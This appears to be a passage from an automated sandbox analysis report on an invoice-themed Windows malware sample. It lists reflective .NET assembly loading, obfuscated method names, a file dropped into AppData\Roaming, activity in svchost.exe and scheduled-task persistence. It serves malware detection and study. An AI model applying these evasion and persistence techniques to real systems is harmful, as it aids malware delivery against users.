            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.351adf0.0.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, KyybefU7jS1OJapg9Y.cs.Net Code: yN7bnauVQW System.Reflection.Assembly.Load(byte[])
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.5e00000.4.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.352c034.1.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 0_2_05A74770 pushad ; retf 0_2_05A74771
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_00408822 push eax; retf 11_2_0040889D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0041482C push edx; ret 11_2_0041482D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_00408892 push eax; retf 11_2_0040889D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0041F269 push edi; iretd 11_2_0041F26B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0040D324 push ecx; ret 11_2_0040D325
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_00418333 push ecx; retf 11_2_00418334
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0041438E push cs; iretd 11_2_0041438F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0040C40C push ss; iretd 11_2_0040C40F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0041F4D3 push edi; ret 11_2_0041F4DE
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_004034E0 push eax; ret 11_2_004034E2
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_004116F5 pushad ; retf 11_2_004116FF
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016D225F pushad ; ret 11_2_016D27F9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016D27FA pushad ; ret 11_2_016D27F9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017009AD push ecx; mov dword ptr [esp], ecx11_2_017009B6
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016D283D push eax; iretd 11_2_016D2858
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeCode function: 12_2_06C1AE89 pushfd ; retn 0006h12_2_06C1AE8A
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeCode function: 12_2_06C1AE59 pushfd ; retn 0006h12_2_06C1AE5A
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeCode function: 12_2_06C1AF58 pushfd ; retn 0006h12_2_06C1AF5A
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeCode function: 12_2_06C1A88B push es; retf 12_2_06C1A88C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0350225F pushad ; ret 15_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035027FA pushad ; ret 15_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035309AD push ecx; mov dword ptr [esp], ecx15_2_035309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0350283D push eax; iretd 15_2_03502858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0350135E push eax; iretd 15_2_03501369
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007D17CC pushfd ; retn 9C65h15_2_007D17DC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007BE212 pushad ; retf 15_2_007BE21C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007C4E50 push ecx; retf 15_2_007C4E51
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007B8F29 push ss; iretd 15_2_007B8F2C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007C1349 push edx; ret 15_2_007C134A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007B533F push eax; retf 15_2_007B53BA
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic PE information: section name: .text entropy: 7.5545631367801445
            Source: dpqsbGoWdXlp.exe.0.drStatic PE information: section name: .text entropy: 7.5545631367801445
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, xw89F7YueMt8vZytUc.csHigh entropy of concatenated method names: 'sWri9Dv2Cr', 'HfliFrxcLH', 'UxPi4PYWD6', 'SlKiBVIZnH', 'xuhivrpmcU', 'dSliH9hikd', 'tmXixgNvRa', 'cZyiaCAnur', 'UBJiCmajrs', 'm6iiwKBAMs'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, SyDLEqfgCqteMB2lecd.csHigh entropy of concatenated method names: 'x4LNTJtFb2', 'Py1NAsZ8yG', 'hxINnTwKS2', 'gWmNWXg7hx', 'HmjNsac63A', 'Ii1NPHFM0A', 'R9rNlpDKEA', 'JNDNYkIBqh', 'FHtN8GpJ4W', 'hq4NVNEY1n'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, KyybefU7jS1OJapg9Y.csHigh entropy of concatenated method names: 'PJS1ECS16K', 'S3Y1K6escH', 'W3J1ikFEp4', 'RvW1QBg5I5', 'PZq13eOdt2', 'AvP1Ochsji', 'bN31S43aya', 'vCt1U7p1pe', 'rin17gYWAh', 'ItO152Qf4x'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, oYsqIlCnTUHAL5yNdT.csHigh entropy of concatenated method names: 'QUHuh7FruA', 't21upavGwj', 'mHou27mwLm', 'Gjuu65hclw', 'PiOu9bfQok', 'EYMuJcnjBj', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, lcdLy2b2BtInoffoCX.csHigh entropy of concatenated method names: 'EVefSw89F7', 'qeMfUt8vZy', 'IdZf59k6MS', 'BiofDtyjIv', 'FUPfjpuXx7', 'moZfcLdiGq', 'eGUquBS7FtqK6M5AqA', 'lDBRFqIUNOm4aPJSIC', 'kmeffj6EiD', 'cvif1v1nfO'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, xPNCP4yKlaxQ4Igfyn.csHigh entropy of concatenated method names: 'Q5tnhUTDn', 'WHxWu5LLH', 'kx9PZjKIJ', 'AfQlejln7', 'zLy8Ik4cg', 'MIOVhIMR4', 'pZ9X69CZpD6xee0eyj', 'yuC93sBUHg0h6iLYsO', 'DjPuxgM2q', 'xUjGapCnn'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, IuWCuwaCZ9qAvA1W6x.csHigh entropy of concatenated method names: 'bN6uKDaq8w', 'OGLuiMmXMA', 'YpOuQi7XBm', 'Meyu3x6kGB', 'BsUuO5aL3s', 'bAruShdFs1', 'XrpuUexEgq', 'vMJu7KAQqb', 'uyYu5lujPq', 'sLWuD9TbGU'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, gASMV9RVBgKVwEwNiD.csHigh entropy of concatenated method names: 'iWvSK0AVR7', 'mgoSQDfFKF', 'pDHSO6u4yU', 'eb5OwxOrXX', 'A6TOzHDon5', 'g5hSgZD5Xj', 'DLWSfk3YNH', 'pY9Sy9Sv3v', 'lunS1Ad3Pk', 'I2aSbwAjNB'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, zRoxmbmHnDHuxCxZCd.csHigh entropy of concatenated method names: 'lHrdYpl1Xy', 'DT5d8GKhGT', 'PR6dhA88ML', 'U0DdpFGXlB', 'b3qd6BFl1E', 'uFmdJ44aUo', 'HendRKae0D', 'fnidIcFG97', 'YpUdLpF2Jq', 'qfBdkskvDN'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, cjIvqmVOZC7W8VUPpu.csHigh entropy of concatenated method names: 'o7C3sDMlZk', 'wtX3lU4LH3', 'XfHQ2G57hp', 'BO3Q6KfRuf', 'X82QJgkpxR', 'f2AQM2DNxT', 'NNmQRgxcMD', 'CZjQIMEtjF', 'YfsQrJwaS6', 'MpIQLHxbSg'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, Kxx6uJrqrlMwC868Od.csHigh entropy of concatenated method names: 'XeMSTDJMso', 'pFSSA5gmwD', 'vlbSnYiZpD', 'g0KSWxewo5', 'fGOSsQvi0A', 'xB0SPH4F77', 'XCWSlLasPF', 'gsZSYkTBAU', 'RgcS8G4JhN', 'dbtSV1fJeb'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, lJ1lmuwDVXmUIT39XW.csHigh entropy of concatenated method names: 'f7XNf494eI', 'GZfN1QnFx9', 'bjfNbO3QL2', 'OSwNKssN49', 'dn7NiWsHbE', 'IxLN3RkdTf', 'xjbNOlfbnt', 'THauxMGepf', 'bI4uasv8mA', 'S6luCqOYTG'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, l3kDJff1JYZOmW6mjYW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rChG9XBC9k', 'V2LGFhMKEE', 'wJyG4JOd4u', 'MH5GBf8JRO', 'IjAGvVuqeh', 'RyiGHpjV3c', 'aY0GxuuoDF'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, GfCw7jQCMa4j5lUVJ1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'DZfyC3Ruq5', 'nW1ywPsUfh', 'QOryzYOcZS', 'o3O1gCjS8b', 'TAU1f6NRQg', 'nl71yTe4S0', 'E5311gWi7D', 'sEqRdMiUELJ0ESrcWRq'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, DwgS3W4DKNAZdSMCnK.csHigh entropy of concatenated method names: 'ToString', 'zTlckgCOgG', 'uL7cpfQne0', 'b2vc2MiVZS', 'WlEc6beF4D', 'bT8cJ6xomp', 'tW2cMVXRN1', 'sNgcRCVDnI', 'LaTcI6bcIW', 'fKacrVFuI8'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, oARh1kffG9A3XXehTWC.csHigh entropy of concatenated method names: 'ToString', 'p1DG1ZBpqA', 'NHxGbUVbY6', 'GdlGEHFfN5', 'NJRGKv0vpt', 'cd6Gi15ZuG', 'rxKGQJ1TVg', 'oaWG3N9NPS', 'thOWPxx2EfNQqcgcmov', 'txH8NMxTcjHZcghXtEN'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, K6t1S68dZ9k6MSsiot.csHigh entropy of concatenated method names: 'SuyQWnF2Id', 'TUVQPyrsDS', 'QZQQY4T2si', 'xluQ8brcpj', 'aZAQjiFrO2', 'SDjQcIkelw', 'mfNQti3Ubo', 'EgtQuM4m3Y', 'Xu2QN87KX4', 'ajZQGHJTtk'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, NOh5oUiP7BEbW3jLcm.csHigh entropy of concatenated method names: 'Dispose', 'SVRfC1PG1k', 'jxZypfTUHV', 'bJlhhNlhGA', 'U2ufwWCuwC', 'w9qfzAvA1W', 'ProcessDialogKey', 'IxdygYsqIl', 'zTUyfHAL5y', 'rdTyy7J1lm'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, LqAds0B4urYTsFfC7W.csHigh entropy of concatenated method names: 'auXt5fInx9', 'NbrtDP6CAY', 'ToString', 'HjjtK98WNB', 'TvJti2Use4', 'TwotQCkLZ4', 'yaGt3AbBeG', 'LIXtO5eYp8', 'MAOtSjxTtI', 'l8gtUtaXq0'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, tx75oZhLdiGqcbtCxe.csHigh entropy of concatenated method names: 'jhoOETkVtN', 'CpNOinFvxv', 'P0pO3hoPUs', 'hDeOSCe1nJ', 'tu5OUlCtfj', 'lOt3vfoLkO', 'JYo3H4w2ZL', 'rN43xsucvt', 'Ou03ac4jHs', 'y7N3CpLSqV'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, xw89F7YueMt8vZytUc.csHigh entropy of concatenated method names: 'sWri9Dv2Cr', 'HfliFrxcLH', 'UxPi4PYWD6', 'SlKiBVIZnH', 'xuhivrpmcU', 'dSliH9hikd', 'tmXixgNvRa', 'cZyiaCAnur', 'UBJiCmajrs', 'm6iiwKBAMs'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, SyDLEqfgCqteMB2lecd.csHigh entropy of concatenated method names: 'x4LNTJtFb2', 'Py1NAsZ8yG', 'hxINnTwKS2', 'gWmNWXg7hx', 'HmjNsac63A', 'Ii1NPHFM0A', 'R9rNlpDKEA', 'JNDNYkIBqh', 'FHtN8GpJ4W', 'hq4NVNEY1n'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, KyybefU7jS1OJapg9Y.csHigh entropy of concatenated method names: 'PJS1ECS16K', 'S3Y1K6escH', 'W3J1ikFEp4', 'RvW1QBg5I5', 'PZq13eOdt2', 'AvP1Ochsji', 'bN31S43aya', 'vCt1U7p1pe', 'rin17gYWAh', 'ItO152Qf4x'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, oYsqIlCnTUHAL5yNdT.csHigh entropy of concatenated method names: 'QUHuh7FruA', 't21upavGwj', 'mHou27mwLm', 'Gjuu65hclw', 'PiOu9bfQok', 'EYMuJcnjBj', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, lcdLy2b2BtInoffoCX.csHigh entropy of concatenated method names: 'EVefSw89F7', 'qeMfUt8vZy', 'IdZf59k6MS', 'BiofDtyjIv', 'FUPfjpuXx7', 'moZfcLdiGq', 'eGUquBS7FtqK6M5AqA', 'lDBRFqIUNOm4aPJSIC', 'kmeffj6EiD', 'cvif1v1nfO'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, xPNCP4yKlaxQ4Igfyn.csHigh entropy of concatenated method names: 'Q5tnhUTDn', 'WHxWu5LLH', 'kx9PZjKIJ', 'AfQlejln7', 'zLy8Ik4cg', 'MIOVhIMR4', 'pZ9X69CZpD6xee0eyj', 'yuC93sBUHg0h6iLYsO', 'DjPuxgM2q', 'xUjGapCnn'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, IuWCuwaCZ9qAvA1W6x.csHigh entropy of concatenated method names: 'bN6uKDaq8w', 'OGLuiMmXMA', 'YpOuQi7XBm', 'Meyu3x6kGB', 'BsUuO5aL3s', 'bAruShdFs1', 'XrpuUexEgq', 'vMJu7KAQqb', 'uyYu5lujPq', 'sLWuD9TbGU'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, gASMV9RVBgKVwEwNiD.csHigh entropy of concatenated method names: 'iWvSK0AVR7', 'mgoSQDfFKF', 'pDHSO6u4yU', 'eb5OwxOrXX', 'A6TOzHDon5', 'g5hSgZD5Xj', 'DLWSfk3YNH', 'pY9Sy9Sv3v', 'lunS1Ad3Pk', 'I2aSbwAjNB'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, zRoxmbmHnDHuxCxZCd.csHigh entropy of concatenated method names: 'lHrdYpl1Xy', 'DT5d8GKhGT', 'PR6dhA88ML', 'U0DdpFGXlB', 'b3qd6BFl1E', 'uFmdJ44aUo', 'HendRKae0D', 'fnidIcFG97', 'YpUdLpF2Jq', 'qfBdkskvDN'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, cjIvqmVOZC7W8VUPpu.csHigh entropy of concatenated method names: 'o7C3sDMlZk', 'wtX3lU4LH3', 'XfHQ2G57hp', 'BO3Q6KfRuf', 'X82QJgkpxR', 'f2AQM2DNxT', 'NNmQRgxcMD', 'CZjQIMEtjF', 'YfsQrJwaS6', 'MpIQLHxbSg'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, Kxx6uJrqrlMwC868Od.csHigh entropy of concatenated method names: 'XeMSTDJMso', 'pFSSA5gmwD', 'vlbSnYiZpD', 'g0KSWxewo5', 'fGOSsQvi0A', 'xB0SPH4F77', 'XCWSlLasPF', 'gsZSYkTBAU', 'RgcS8G4JhN', 'dbtSV1fJeb'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, lJ1lmuwDVXmUIT39XW.csHigh entropy of concatenated method names: 'f7XNf494eI', 'GZfN1QnFx9', 'bjfNbO3QL2', 'OSwNKssN49', 'dn7NiWsHbE', 'IxLN3RkdTf', 'xjbNOlfbnt', 'THauxMGepf', 'bI4uasv8mA', 'S6luCqOYTG'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, l3kDJff1JYZOmW6mjYW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rChG9XBC9k', 'V2LGFhMKEE', 'wJyG4JOd4u', 'MH5GBf8JRO', 'IjAGvVuqeh', 'RyiGHpjV3c', 'aY0GxuuoDF'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, GfCw7jQCMa4j5lUVJ1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'DZfyC3Ruq5', 'nW1ywPsUfh', 'QOryzYOcZS', 'o3O1gCjS8b', 'TAU1f6NRQg', 'nl71yTe4S0', 'E5311gWi7D', 'sEqRdMiUELJ0ESrcWRq'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, DwgS3W4DKNAZdSMCnK.csHigh entropy of concatenated method names: 'ToString', 'zTlckgCOgG', 'uL7cpfQne0', 'b2vc2MiVZS', 'WlEc6beF4D', 'bT8cJ6xomp', 'tW2cMVXRN1', 'sNgcRCVDnI', 'LaTcI6bcIW', 'fKacrVFuI8'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, oARh1kffG9A3XXehTWC.csHigh entropy of concatenated method names: 'ToString', 'p1DG1ZBpqA', 'NHxGbUVbY6', 'GdlGEHFfN5', 'NJRGKv0vpt', 'cd6Gi15ZuG', 'rxKGQJ1TVg', 'oaWG3N9NPS', 'thOWPxx2EfNQqcgcmov', 'txH8NMxTcjHZcghXtEN'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, K6t1S68dZ9k6MSsiot.csHigh entropy of concatenated method names: 'SuyQWnF2Id', 'TUVQPyrsDS', 'QZQQY4T2si', 'xluQ8brcpj', 'aZAQjiFrO2', 'SDjQcIkelw', 'mfNQti3Ubo', 'EgtQuM4m3Y', 'Xu2QN87KX4', 'ajZQGHJTtk'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, NOh5oUiP7BEbW3jLcm.csHigh entropy of concatenated method names: 'Dispose', 'SVRfC1PG1k', 'jxZypfTUHV', 'bJlhhNlhGA', 'U2ufwWCuwC', 'w9qfzAvA1W', 'ProcessDialogKey', 'IxdygYsqIl', 'zTUyfHAL5y', 'rdTyy7J1lm'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, LqAds0B4urYTsFfC7W.csHigh entropy of concatenated method names: 'auXt5fInx9', 'NbrtDP6CAY', 'ToString', 'HjjtK98WNB', 'TvJti2Use4', 'TwotQCkLZ4', 'yaGt3AbBeG', 'LIXtO5eYp8', 'MAOtSjxTtI', 'l8gtUtaXq0'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, tx75oZhLdiGqcbtCxe.csHigh entropy of concatenated method names: 'jhoOETkVtN', 'CpNOinFvxv', 'P0pO3hoPUs', 'hDeOSCe1nJ', 'tu5OUlCtfj', 'lOt3vfoLkO', 'JYo3H4w2ZL', 'rN43xsucvt', 'Ou03ac4jHs', 'y7N3CpLSqV'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, xw89F7YueMt8vZytUc.csHigh entropy of concatenated method names: 'sWri9Dv2Cr', 'HfliFrxcLH', 'UxPi4PYWD6', 'SlKiBVIZnH', 'xuhivrpmcU', 'dSliH9hikd', 'tmXixgNvRa', 'cZyiaCAnur', 'UBJiCmajrs', 'm6iiwKBAMs'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, SyDLEqfgCqteMB2lecd.csHigh entropy of concatenated method names: 'x4LNTJtFb2', 'Py1NAsZ8yG', 'hxINnTwKS2', 'gWmNWXg7hx', 'HmjNsac63A', 'Ii1NPHFM0A', 'R9rNlpDKEA', 'JNDNYkIBqh', 'FHtN8GpJ4W', 'hq4NVNEY1n'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, KyybefU7jS1OJapg9Y.csHigh entropy of concatenated method names: 'PJS1ECS16K', 'S3Y1K6escH', 'W3J1ikFEp4', 'RvW1QBg5I5', 'PZq13eOdt2', 'AvP1Ochsji', 'bN31S43aya', 'vCt1U7p1pe', 'rin17gYWAh', 'ItO152Qf4x'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, oYsqIlCnTUHAL5yNdT.csHigh entropy of concatenated method names: 'QUHuh7FruA', 't21upavGwj', 'mHou27mwLm', 'Gjuu65hclw', 'PiOu9bfQok', 'EYMuJcnjBj', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, lcdLy2b2BtInoffoCX.csHigh entropy of concatenated method names: 'EVefSw89F7', 'qeMfUt8vZy', 'IdZf59k6MS', 'BiofDtyjIv', 'FUPfjpuXx7', 'moZfcLdiGq', 'eGUquBS7FtqK6M5AqA', 'lDBRFqIUNOm4aPJSIC', 'kmeffj6EiD', 'cvif1v1nfO'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, xPNCP4yKlaxQ4Igfyn.csHigh entropy of concatenated method names: 'Q5tnhUTDn', 'WHxWu5LLH', 'kx9PZjKIJ', 'AfQlejln7', 'zLy8Ik4cg', 'MIOVhIMR4', 'pZ9X69CZpD6xee0eyj', 'yuC93sBUHg0h6iLYsO', 'DjPuxgM2q', 'xUjGapCnn'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, IuWCuwaCZ9qAvA1W6x.csHigh entropy of concatenated method names: 'bN6uKDaq8w', 'OGLuiMmXMA', 'YpOuQi7XBm', 'Meyu3x6kGB', 'BsUuO5aL3s', 'bAruShdFs1', 'XrpuUexEgq', 'vMJu7KAQqb', 'uyYu5lujPq', 'sLWuD9TbGU'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, gASMV9RVBgKVwEwNiD.csHigh entropy of concatenated method names: 'iWvSK0AVR7', 'mgoSQDfFKF', 'pDHSO6u4yU', 'eb5OwxOrXX', 'A6TOzHDon5', 'g5hSgZD5Xj', 'DLWSfk3YNH', 'pY9Sy9Sv3v', 'lunS1Ad3Pk', 'I2aSbwAjNB'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, zRoxmbmHnDHuxCxZCd.csHigh entropy of concatenated method names: 'lHrdYpl1Xy', 'DT5d8GKhGT', 'PR6dhA88ML', 'U0DdpFGXlB', 'b3qd6BFl1E', 'uFmdJ44aUo', 'HendRKae0D', 'fnidIcFG97', 'YpUdLpF2Jq', 'qfBdkskvDN'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, cjIvqmVOZC7W8VUPpu.csHigh entropy of concatenated method names: 'o7C3sDMlZk', 'wtX3lU4LH3', 'XfHQ2G57hp', 'BO3Q6KfRuf', 'X82QJgkpxR', 'f2AQM2DNxT', 'NNmQRgxcMD', 'CZjQIMEtjF', 'YfsQrJwaS6', 'MpIQLHxbSg'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, Kxx6uJrqrlMwC868Od.csHigh entropy of concatenated method names: 'XeMSTDJMso', 'pFSSA5gmwD', 'vlbSnYiZpD', 'g0KSWxewo5', 'fGOSsQvi0A', 'xB0SPH4F77', 'XCWSlLasPF', 'gsZSYkTBAU', 'RgcS8G4JhN', 'dbtSV1fJeb'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, lJ1lmuwDVXmUIT39XW.csHigh entropy of concatenated method names: 'f7XNf494eI', 'GZfN1QnFx9', 'bjfNbO3QL2', 'OSwNKssN49', 'dn7NiWsHbE', 'IxLN3RkdTf', 'xjbNOlfbnt', 'THauxMGepf', 'bI4uasv8mA', 'S6luCqOYTG'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, l3kDJff1JYZOmW6mjYW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rChG9XBC9k', 'V2LGFhMKEE', 'wJyG4JOd4u', 'MH5GBf8JRO', 'IjAGvVuqeh', 'RyiGHpjV3c', 'aY0GxuuoDF'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, GfCw7jQCMa4j5lUVJ1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'DZfyC3Ruq5', 'nW1ywPsUfh', 'QOryzYOcZS', 'o3O1gCjS8b', 'TAU1f6NRQg', 'nl71yTe4S0', 'E5311gWi7D', 'sEqRdMiUELJ0ESrcWRq'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, DwgS3W4DKNAZdSMCnK.csHigh entropy of concatenated method names: 'ToString', 'zTlckgCOgG', 'uL7cpfQne0', 'b2vc2MiVZS', 'WlEc6beF4D', 'bT8cJ6xomp', 'tW2cMVXRN1', 'sNgcRCVDnI', 'LaTcI6bcIW', 'fKacrVFuI8'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, oARh1kffG9A3XXehTWC.csHigh entropy of concatenated method names: 'ToString', 'p1DG1ZBpqA', 'NHxGbUVbY6', 'GdlGEHFfN5', 'NJRGKv0vpt', 'cd6Gi15ZuG', 'rxKGQJ1TVg', 'oaWG3N9NPS', 'thOWPxx2EfNQqcgcmov', 'txH8NMxTcjHZcghXtEN'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, K6t1S68dZ9k6MSsiot.csHigh entropy of concatenated method names: 'SuyQWnF2Id', 'TUVQPyrsDS', 'QZQQY4T2si', 'xluQ8brcpj', 'aZAQjiFrO2', 'SDjQcIkelw', 'mfNQti3Ubo', 'EgtQuM4m3Y', 'Xu2QN87KX4', 'ajZQGHJTtk'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, NOh5oUiP7BEbW3jLcm.csHigh entropy of concatenated method names: 'Dispose', 'SVRfC1PG1k', 'jxZypfTUHV', 'bJlhhNlhGA', 'U2ufwWCuwC', 'w9qfzAvA1W', 'ProcessDialogKey', 'IxdygYsqIl', 'zTUyfHAL5y', 'rdTyy7J1lm'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, LqAds0B4urYTsFfC7W.csHigh entropy of concatenated method names: 'auXt5fInx9', 'NbrtDP6CAY', 'ToString', 'HjjtK98WNB', 'TvJti2Use4', 'TwotQCkLZ4', 'yaGt3AbBeG', 'LIXtO5eYp8', 'MAOtSjxTtI', 'l8gtUtaXq0'
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, tx75oZhLdiGqcbtCxe.csHigh entropy of concatenated method names: 'jhoOETkVtN', 'CpNOinFvxv', 'P0pO3hoPUs', 'hDeOSCe1nJ', 'tu5OUlCtfj', 'lOt3vfoLkO', 'JYo3H4w2ZL', 'rN43xsucvt', 'Ou03ac4jHs', 'y7N3CpLSqV'
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeFile created: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
